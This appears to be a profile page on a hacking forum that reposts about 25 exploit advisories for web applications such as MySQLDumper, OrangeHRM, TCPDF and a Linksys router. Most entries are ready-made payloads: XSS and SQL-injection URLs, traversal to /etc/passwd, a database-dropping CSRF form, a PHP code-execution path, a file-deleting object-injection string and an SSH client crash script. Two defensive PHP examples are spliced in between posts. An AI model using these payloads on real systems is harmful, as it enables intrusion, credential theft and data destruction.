
HireHackking


Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
  2. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
  3. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
  4. source: https://www.securityfocus.com/bid/53306/info

     MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.

     <img src="http://www.example.com/tld/meonyourpc.PNG" height="250" width="300" />
     <form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
       <p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
       <input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
     </form>
  5. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/restore.php http://www.example.com/learn/cubemail/dump.php http://www.example.com/learn/cubemail/refresh_dblist.php
  6. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
  7. # Exploit Title: WordPress Free Counter Plugin [Stored XSS]
     # Date: 2015/05/25
     # Exploit Author: Panagiotis Vagenas
     # Contact: https://twitter.com/panVagenas
     # Vendor Homepage: http://www.free-counter.org
     # Software Link: https://wordpress.org/plugins/free-counter/
     # Version: 1.1
     # Tested on: WordPress 4.2.2
     # Category: webapps
     # CVE: CVE-2015-4084

     1. Description

     Any authenticated or non-authenticated user can perform a stored XSS attack simply by exploiting the wp_ajax_nopriv_check_stat action. The plugin uses a widget to display the website's visits, so any page that contains this widget will also load the malicious JS code.

     2. Proof of Concept

     * Send a POST request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
     * As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'.
     * Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>`
     * Visit a page of the infected website that displays the plugin's widget.

     Note that the plugin uses the update_option function to store the $_POST['value_'] contents in the DB, so any code inserted there will be escaped. Even so, a malicious user can omit the quotes in the src attr of the script tag; most modern browsers will treat the tag as if they were there.

     3. Solution

     No official solution yet exists.
  8. source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
  9. source: https://www.securityfocus.com/bid/53310/info

     MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.

     Vulnerable code section:

     /*
     //menu.php
     if (isset($_POST['selected_config'])||isset($_GET['config']))
     {
         if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config']; // Configuration was switched in content frame?
         if (isset($_GET['config'])) $new_config=$_GET['config']; // restore the last active menuitem
         if (is_readable($config['paths']['config'].$new_config.'.php'))
         {
             clearstatcache();
             unset($databases);
             $databases=array();
             if (read_config($new_config))
             {
                 $config['config_file']=$new_config;
                 $_SESSION['config_file']=$new_config; //$config['config_file'];
                 $config_refresh=' <script language="JavaScript" type="text/javascript">
                     if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1) {
                         var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
                     } else selected_div=\'\';
                     parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
             }
             if (isset($_GET['config'])) $config_refresh=''; // prevent a re-invocation when handed over from the content area
         }
     }
     */

     As you can see we can traverse it, and if we look at the read_config() function:

     //inc/functions_global.php
     function read_config($file=false)
     {
         global $config,$databases;
         $ret=false;
         if (!$file) $file=$config['config_file'];
         // protect from including external files
         $search=array(':', 'http', 'ftp', ' ');
         $replace=array('', '', '', '');
         $file=str_replace($search,$replace,$file);
         if (is_readable($config['paths']['config'].$file.'.php'))
         {
             // to prevent modern server from caching the new configuration we need to evaluate it this way
             clearstatcache();
             $f=implode('',file($config['paths']['config'].$file.'.php'));
             $f=str_replace('<?php','',$f);
             $f=str_replace('?>','',$f);
             eval($f);
             $config['config_file']=$file;
             $_SESSION['config_file']=$config['config_file'];
             $ret=true;
         }
         return $ret;
     }

     This means a remote attacker can iterate his/her code as PHP. (Notice: eval($f))

     Our exploit: http://www.example.com/learn/cubemail/menu.php?config=../../ss

     where ss = ss.php

     #cat ss.php
     # e.g. the attacker uploaded his/her own file:
     echo 'Our command executed ' . getcwd();
     phpinfo();
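The post above shows two weaknesses stacked in read_config(): a token blacklist (':', 'http', 'ftp', ' ') that never touches '../', and eval() over the file contents. The following is an added example, not MySQLDumper's code, showing why the blacklist is insufficient and what a whitelist-plus-containment loader looks like instead. It assumes PHP 8 (for str_starts_with) and constructs its own throwaway config directory under the system temp dir; the function and directory names are the example's own.

```php
<?php
// Added example (not MySQLDumper code): blacklist vs. whitelist handling of a
// user-supplied config name, and include-of-a-returning-file instead of eval().

// The post's filter, reproduced for comparison: it strips a few tokens but
// leaves path separators and '..' untouched, so traversal survives it.
function blacklist_filter(string $file): string {
    $search  = [':', 'http', 'ftp', ' '];
    $replace = ['', '', '', ''];
    return str_replace($search, $replace, $file);
}

// Whitelist: a config *name* is a short token, never a path. Anything with a
// slash, a dot or a null byte is rejected outright.
function is_valid_config_name(string $name): bool {
    return (bool) preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name);
}

// Defence in depth: resolve the candidate path (following symlinks) and insist
// that the result still lies inside $configDir. Returns null when it does not.
function resolve_inside(string $configDir, string $name): ?string {
    $base = realpath($configDir);
    $path = realpath($configDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// Load a config file that *returns* an array. The file is still PHP, but no
// string assembled from request data ever reaches eval().
function load_config(string $configDir, string $name): ?array {
    if (!is_valid_config_name($name)) {
        return null;
    }
    $path = resolve_inside($configDir, $name);
    if ($path === null) {
        return null;
    }
    $cfg = include $path;
    return is_array($cfg) ? $cfg : null;
}

// --- demo on a constructed directory layout (assumption: writable temp dir) ---
$root = sys_get_temp_dir() . '/cfgdemo_' . bin2hex(random_bytes(4));
mkdir($root . '/config', 0700, true);
// legitimate config inside config/
file_put_contents($root . '/config/mysqldumper.php', "<?php\nreturn ['dbhost' => 'localhost'];\n");
// a file one level *above* config/, standing in for the post's ss.php
file_put_contents($root . '/ss.php', "<?php\nreturn ['outside' => true];\n");

printf("blacklist_filter('../../ss') leaves: %s\n", blacklist_filter('../../ss'));
printf("load_config(config, 'mysqldumper') -> %s\n", json_encode(load_config($root . '/config', 'mysqldumper')));
printf("load_config(config, '../ss')       -> %s\n", json_encode(load_config($root . '/config', '../ss')));
// Even if the name check were skipped, containment rejects the resolved path:
printf("resolve_inside(config, '../ss')    -> %s\n", var_export(resolve_inside($root . '/config', '../ss'), true));

// clean up the constructed files
unlink($root . '/config/mysqldumper.php');
unlink($root . '/ss.php');
rmdir($root . '/config');
rmdir($root);
```

The two checks are deliberately independent: the regex rejects the request before any filesystem call, and the realpath comparison catches anything that slips past a weaker name check (including symlinks planted inside the config directory). Replacing eval() with an include of a file that returns an array also removes the need for the `<?php`/`?>` stripping the original does by hand.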
  10. source: https://www.securityfocus.com/bid/53398/info Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Trombinoscope 3.5 and prior versions are vulnerable. http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
  11. source: https://www.securityfocus.com/bid/53355/info iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp
  12. source: https://www.securityfocus.com/bid/53411/info Ramui Forum Script is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
  13. source: https://www.securityfocus.com/bid/53409/info Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. The following products are affected: Schneider Electric Telecontrol Kerweb versions prior to 3.0.1 Schneider Electric Telecontrol Kerwin versions prior to 6.0.1 http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename=[XSS]
  14. source: https://www.securityfocus.com/bid/53413/info JibberBook is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. Attackers can exploit this issue to bypass authentication to gain administrative privileges ; this may aid in launching further attacks. JibberBook 2.3 is vulnerable; other versions may also be affected. http://www.example.com/Admin/Login_form.php?loggedin=true
  15. source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,ENCODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
  16. source: https://www.securityfocus.com/bid/53426/info

      PHP Enter is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. PHP Enter 4.1.2 is vulnerable; other versions may also be affected.

      <form method="post" action="http://www.example.com/admin/banners.php">
        <center>
          <font color=#3A586A>Code</font><br />
          <textarea name="code">&lt;/textarea&gt;
          <br /><br />
          <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
      </form>
  17. source: https://www.securityfocus.com/bid/53427/info The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability. Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1
  18. source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&empId=1
  19. source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  20. source: https://www.securityfocus.com/bid/53448/info Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks. Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
  21. source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  22. source: https://www.securityfocus.com/bid/53434/info PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. PivotX 2.3.2 is vulnerable; other versions may also be affected. http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  23. source: https://www.securityfocus.com/bid/53448/info Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks. Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
  24. '''
      # Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
      # Date: 27-5-2015
      # Vendor homepage: www.privateshell.com
      # Software Link: http://www.privateshell.com/files/pshell.exe
      # Version: 3.3
      # Author: 3unnym00n
      # Details:
      # --------
      # when doing the ssh version exchange, if the server sends a banner missing \r\n, it can lead to a pshell crash
      # Tested On: win7
      # operating steps: run the py, then execute: "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1
      '''
      import socket

      soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      soc.bind(('127.0.0.1', 22))
      soc.listen(1)
      client, addr = soc.accept()
      client.send('SSH-2.0-SUCK')  ## no "\r\n" leads to crash
  25. TCPDF library Universal POI Payload to Arbitrary File Deletion

      [+] Author: Filippo Roncari
      [+] Target: TCPDF library
      [+] Version: <= 5.9 and probably others [tested on v5.9]
      [+] Vendor: http://www.tcpdf.org
      [+] Accessibility: Remote
      [+] Severity: High
      [+] CVE: n/a
      [+] Advisory URL: n/a
      [+] Contacts: f.roncari@securenetwork.it / f@unsec.it

      [+] Summary

      The TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications which make use of the TCPDF library is shared here.

      [+] Exploit Details

      The identified payload allows exploiting any POI-vulnerable web application that uses unserialize() on unsanitized user input at a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows arbitrary deletion of files on the filesystem.

      [+] Technical Details

      Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows.

      [!] Method __destruct() in tcpdf.php
      -------------------------
      public function __destruct() {
          // restore internal encoding
          if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) {
              mb_internal_encoding($this->internal_encoding);
          }
          // unset all class variables
          $this->_destroy(true);
      }
      -------------------------

      As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer.

      [!] Method _destroy() in tcpdf.php
      -------------------------
      public function _destroy($destroyall=false, $preserve_objcopy=false) {
          if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) {
              unlink($this->buffer);
          }
          [...]
      }
      -------------------------

      For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties.

      [!] $buffer in tcpdf.php
      -------------------------
      /**
       * @var buffer holding in-memory PDF
       * @access protected
       */
      protected $buffer;
      -------------------------

      [+] Proof of Concept (PoC)

      In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. Particular attention must be paid to the null bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null bytes during payload injection will result in the exploit's failure.

      [!] Payload
      -------------------------
      O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;}
      -------------------------

      [!] Generic PoC Exploit
      -------------------------
      http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;}
      -------------------------

      [+] Disclaimer

      Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
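The advisory above turns on two PHP details worth seeing in running code: how protected properties are encoded (the "\0*\0" prefix behind the %00*%00 in the payload) and the fact that a destructor fires on whatever object unserialize() builds, whether or not a constructor ever ran. The following is an added example, not TCPDF's code. It uses a stand-in class named Doc whose destructor only records what a real gadget would unlink, and shows the mitigation that stops the destructor from being reachable at all: unserialize() with allowed_classes set to false (PHP 7.0+), which yields an inert __PHP_Incomplete_Class. The class, function and path names are the example's own.

```php
<?php
// Added example (not TCPDF code): protected-property serialization and the
// allowed_classes mitigation for PHP object injection.

class Doc {
    public static array $log = [];        // records what the destructor would have done
    protected $buffer = '';               // stand-in for TCPDF's protected $buffer
    protected $diskcache = false;         // stand-in for TCPDF's protected $diskcache

    public function __construct(string $buffer, bool $diskcache) {
        $this->buffer = $buffer;
        $this->diskcache = $diskcache;
    }

    public function __destruct() {
        // Where the real class calls unlink($this->buffer), we only log it.
        if ($this->diskcache && $this->buffer !== '') {
            self::$log[] = 'destructor would unlink ' . $this->buffer;
        }
    }
}

// Render embedded null bytes as %00 so the encoding is visible on a terminal.
function visible(string $blob): string {
    return str_replace("\0", '%00', $blob);
}

// Unsafe: any class on the autoload path may be instantiated, so Doc::__destruct
// runs as soon as the deserialized object goes out of scope.
function unsafe_load(string $blob): void {
    $obj = unserialize($blob);
    unset($obj);
}

// Safe: no class is allowed, so PHP builds a __PHP_Incomplete_Class instead.
// It carries the data but none of Doc's methods, so no destructor can run.
function safe_load(string $blob): string {
    $obj = unserialize($blob, ['allowed_classes' => false]);
    return get_class($obj);
}

// Build a blob shaped like the advisory's payload (constructed sample path).
$blob = serialize(new Doc('/var/www/arbitraryfile.ext', true));
Doc::$log = [];   // the temporary object above was destroyed too; start clean

echo "serialized form: ", visible($blob), "\n";
// Each protected name is wrapped in "\0*\0", which is why s:9 covers "buffer"
// and s:12 covers "diskcache", exactly as in the advisory's payload.

unsafe_load($blob);
printf("unsafe_load: %d destructor action(s) recorded\n", count(Doc::$log));
Doc::$log = [];

printf("safe_load: object class is %s\n", safe_load($blob));
printf("safe_load: %d destructor action(s) recorded\n", count(Doc::$log));

// The advisory's note on null bytes, demonstrated: if a layer strips the
// null bytes, the declared lengths no longer match and unserialize() fails.
$stripped = str_replace("\0", '', $blob);
printf("null bytes stripped: unserialize returns %s\n", var_export(@unserialize($stripped), true));
```

Two practical consequences follow. For code that must deserialize untrusted input, `allowed_classes => false` (or a short explicit list) is the switch that removes the gadget path, and json_decode() is the better choice when a plain data structure is all that is needed. For detection, the %00*%00 sequence next to an `O:` class header is a reliable marker in request logs, since it only arises when someone hand-builds a serialized object with protected properties.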